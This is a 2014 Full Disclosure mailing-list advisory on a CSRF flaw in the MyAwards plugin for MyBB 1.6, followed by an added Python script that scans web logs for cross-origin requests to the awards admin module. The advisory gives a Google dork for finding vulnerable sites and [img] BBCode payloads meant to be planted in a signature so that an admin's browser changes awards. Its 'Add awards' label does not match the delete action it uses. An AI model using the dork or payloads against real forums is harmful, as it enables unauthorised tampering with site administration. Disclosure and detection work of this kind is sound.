
List:       full-disclosure
Subject:    [FD] MyBB 1.6 - MyAwards CSRF
From:       surivaton surivaton <surivaton () gmail ! com>
Date:       2014-08-22 8:52:01
Message-ID: CAFqzMLUXaKQXqtjj4v_ysrFksJERkR=GJuyw5hTUohuNkksgJA () mail ! gmail ! com

# Google Dork: allinurl:myawards.php
# Date: 08/17/2014
# Exploit Author: Vagineer https://vagineering.me
# Version: ALL VERSIONS
# Tested on: MyBB 1.6.15

PoC (set this as your signature or iframe it)
Add awards
[img]
https://website.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2
[/img]
Remove awards
[img]
https://website.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1
[/img]

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
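
Added example, not part of the original post: a log check that flags GET requests to the awards admin module which carry an action but did not originate from the admin panel itself, which is how an [img]- or iframe-embedded request shows up server-side. It assumes Apache/nginx combined log format and the host and admin path written in the advisory's URLs; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" log format (assumed).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$')

SITE_HOST = "website.com"        # host as written in the advisory's URLs
ADMIN_DIR = "/forum/admin/"      # admin path as written in the advisory's URLs
MODULE = "user-awards"           # module parameter from the advisory


def find_suspects(lines):
    """Return (ip, target, reason) for GET requests that trigger an action in
    the awards admin module but were not navigated to from the admin panel."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["method"] != "GET":
            continue
        target = urlsplit(m["target"])
        query = parse_qs(target.query)
        if target.path != ADMIN_DIR + "index.php" or query.get("module") != [MODULE]:
            continue
        if "action" not in query:
            continue  # module listing page, no action requested
        ref = m["referer"]
        if ref in ("", "-"):
            hits.append((m["ip"], m["target"], "no referer"))
            continue
        r = urlsplit(ref)
        if r.hostname != SITE_HOST or not r.path.startswith(ADMIN_DIR):
            hits.append((m["ip"], m["target"], "referer outside admin panel: " + ref))
    return hits


# Constructed sample lines (not taken from any real server).
SAMPLE_REQ = '"GET /forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1 HTTP/1.1" 200 512'
SAMPLE_TS = "[22/Aug/2014:09:01:12 +0000]"
SAMPLE_LOG = [
    f'203.0.113.7 - - {SAMPLE_TS} {SAMPLE_REQ} "https://website.com/forum/showthread.php?tid=5" "Mozilla/5.0"',
    f'203.0.113.7 - - {SAMPLE_TS} {SAMPLE_REQ} "https://website.com/forum/admin/index.php?module=user-awards" "Mozilla/5.0"',
    f'203.0.113.7 - - {SAMPLE_TS} "GET /forum/admin/index.php?module=user-awards HTTP/1.1" 200 900 "https://website.com/forum/admin/index.php" "Mozilla/5.0"',
    f'203.0.113.7 - - {SAMPLE_TS} {SAMPLE_REQ} "https://other.example/forum/admin/x.html" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, target, reason in find_suspects(SAMPLE_LOG):
        print(ip, target, reason)
```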